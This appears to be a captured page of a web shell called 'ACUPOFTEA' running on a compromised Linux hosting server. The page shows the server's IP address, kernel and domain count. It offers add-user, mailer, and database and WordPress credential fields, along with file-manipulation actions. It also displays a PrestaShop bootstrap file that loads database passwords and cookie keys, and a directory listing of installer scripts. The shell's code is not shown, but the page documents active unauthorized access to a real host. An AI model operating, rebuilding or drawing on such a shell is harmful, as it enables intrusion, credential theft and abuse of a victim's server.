System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
presta17
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
_bootstrap.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ use PrestaShop\PrestaShop\Adapter\ServiceLocator; use PrestaShop\PrestaShop\Core\ContainerBuilder; use Symfony\Component\Filesystem\Exception\IOException; use Symfony\Component\Filesystem\Filesystem; use Symfony\Component\HttpKernel\CacheWarmer\CacheWarmerAggregate; use Symfony\Component\Yaml\Yaml; $container_builder = new ContainerBuilder(); $legacyContainer = $container_builder->build(); ServiceLocator::setServiceContainerInstance($legacyContainer); if (!file_exists(_PS_CACHE_DIR_)) { @mkdir(_PS_CACHE_DIR_); $warmer = new CacheWarmerAggregate([ new PrestaShopBundle\Cache\LocalizationWarmer(_PS_VERSION_, 'en'), //@replace hard-coded Lang ]); $warmer->warmUp(_PS_CACHE_DIR_); } $configDirectory = __DIR__. '/../app/config'; $phpParametersFilepath = $configDirectory . '/parameters.php'; $yamlParametersFilepath = $configDirectory . '/parameters.yml'; $filesystem = new Filesystem(); $exportPhpConfigFile = function ($config, $destination) use ($filesystem) { try { $filesystem->dumpFile($destination, '<?php return '.var_export($config, true).';'."\n"); } catch (IOException $e) { return false; } return true; }; // Bootstrap an application with parameters.yml, which has been installed before PHP parameters file support if (!file_exists($phpParametersFilepath) && file_exists($yamlParametersFilepath)) { $parameters = Yaml::parseFile($yamlParametersFilepath); if ($exportPhpConfigFile($parameters, $phpParametersFilepath)) { $filesystem->dumpFile($yamlParametersFilepath, 'parameters:' . "\n"); } } $lastParametersModificationTime = (int)@filemtime($phpParametersFilepath); if ($lastParametersModificationTime) { $cachedParameters = _PS_CACHE_DIR_. 'appParameters.php'; $lastParametersCacheModificationTime = (int)@filemtime($cachedParameters); if (!$lastParametersCacheModificationTime || $lastParametersCacheModificationTime < $lastParametersModificationTime) { // When parameters file is available, update its cache if it is stale. if (file_exists($phpParametersFilepath)) { $config = require $phpParametersFilepath; $exportPhpConfigFile($config, $cachedParameters); } elseif (file_exists($yamlParametersFilepath)) { $config = Yaml::parseFile($yamlParametersFilepath); $exportPhpConfigFile($config, $cachedParameters); } } $config = require_once _PS_CACHE_DIR_ . 'appParameters.php'; array_walk($config['parameters'], function (&$param) { $param = str_replace('%%', '%', $param ?? ''); }); $database_host = $config['parameters']['database_host']; if (!empty($config['parameters']['database_port'])) { $database_host .= ':'. $config['parameters']['database_port']; } define('_DB_SERVER_', $database_host); if (defined('_PS_IN_TEST_')) { define('_DB_NAME_', 'test_'.$config['parameters']['database_name']); } else { define('_DB_NAME_', $config['parameters']['database_name']); } define('_DB_USER_', $config['parameters']['database_user']); define('_DB_PASSWD_', $config['parameters']['database_password']); define('_DB_PREFIX_', $config['parameters']['database_prefix']); define('_MYSQL_ENGINE_', $config['parameters']['database_engine']); define('_PS_CACHING_SYSTEM_', $config['parameters']['ps_caching']); if (!defined('PS_IN_UPGRADE') && !defined('_PS_IN_TEST_')) { define('_PS_CACHE_ENABLED_', $config['parameters']['ps_cache_enable']); } else { define('_PS_CACHE_ENABLED_', 0); $config['parameters']['ps_cache_enable'] = 0; } // Legacy cookie if (array_key_exists('cookie_key', $config['parameters'])) { define('_COOKIE_KEY_', $config['parameters']['cookie_key']); } else { // Define cookie key if missing to prevent failure in composer post-install script define('_COOKIE_KEY_', Tools::passwdGen(56)); } if (array_key_exists('cookie_iv', $config['parameters'])) { define('_COOKIE_IV_', $config['parameters']['cookie_iv']); } else { // Define cookie IV if missing to prevent failure in composer post-install script define('_COOKIE_IV_', Tools::passwdGen(32)); } // New cookie if (array_key_exists('new_cookie_key', $config['parameters'])) { define('_NEW_COOKIE_KEY_', $config['parameters']['new_cookie_key']); } else { // Define cookie key if missing to prevent failure in composer post-install script $key = PhpEncryption::createNewRandomKey(); echo '<new_cookie_key>'.$key.'</new_cookie_key>'; @unlink($cachedParameters); define('_NEW_COOKIE_KEY_', $key); } define('_PS_CREATION_DATE_', $config['parameters']['ps_creation_date']); if (isset($config['parameters']['_rijndael_key'], $config['parameters']['_rijndael_iv'])) { define('_RIJNDAEL_KEY_', $config['parameters']['_rijndael_key']); define('_RIJNDAEL_IV_', $config['parameters']['_rijndael_iv']); } }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
bootstrap_old
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
images
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php53
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php56
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php71
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php81
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php82
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
.htaccess
text/plain
4.86 KB
-rw-r--r--
2025-06-19 02:46:34
_bootstrap.php
text/x-php
5.99 KB
-rw-r--r--
2025-06-19 02:46:34
bootstrap.php
text/x-php
5.91 KB
-rw-r--r--
2025-06-19 02:46:34
changelog.txt
text/plain
4.41 KB
-rw-r--r--
2025-06-19 02:46:34
clone.php
text/x-php
28.3 KB
-rw-r--r--
2025-06-27 07:38:10
clone_bootstrap.php
text/x-php
6.04 KB
-rw-r--r--
2025-06-19 02:46:34
edit.php
text/x-php
4.95 KB
-rw-r--r--
2025-06-27 07:38:10
edit.xml
text/html
447 B
-rw-r--r--
2024-01-03 04:51:40
extend.php
text/x-php
9.08 KB
-rw-r--r--
2025-06-27 07:38:10
fileindex.php
text/plain
478 B
-rw-r--r--
2025-06-19 02:46:34
import.php
text/x-php
6.6 KB
-rw-r--r--
2025-06-27 07:38:10
info.xml
text/html
4.68 KB
-rw-r--r--
2025-06-27 07:27:26
install.js
text/plain
1.12 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
20.06 KB
-rw-r--r--
2025-06-27 07:38:10
install.xml
text/html
1.51 KB
-rw-r--r--
2024-04-16 09:24:16
md5
text/plain
2.17 KB
-rw-r--r--
2025-06-27 07:38:10
new_order.html
text/html
56.92 KB
-rw-r--r--
2025-06-19 02:46:34
notes.txt
text/plain
2.78 KB
-rw-r--r--
2025-06-19 02:46:34
order_conf.html
text/html
56.13 KB
-rw-r--r--
2025-06-19 02:46:34
parameters.php
text/x-php
826 B
-rw-r--r--
2025-06-19 02:46:34
parameters.yml
text/plain
11 B
-rw-r--r--
2021-12-23 06:54:36
return_slip.html
text/html
43.86 KB
-rw-r--r--
2025-06-19 02:46:34
robots.txt
text/plain
4.73 KB
-rw-r--r--
2025-06-19 02:46:34
settings.inc.php
text/x-php
23 B
-rw-r--r--
2021-12-23 06:54:36
shop1.json
text/plain
3.04 KB
-rw-r--r--
2025-06-19 02:46:34
soft_delete.php
text/x-php
3.08 KB
-rw-r--r--
2021-12-23 06:54:36
update_appkey.php
text/x-php
544 B
-rw-r--r--
2023-07-17 09:33:24
update_pass.php
text/x-php
497 B
-rw-r--r--
2023-03-21 05:54:32
~ ACUPOFTEA - mail.ontime-ae.com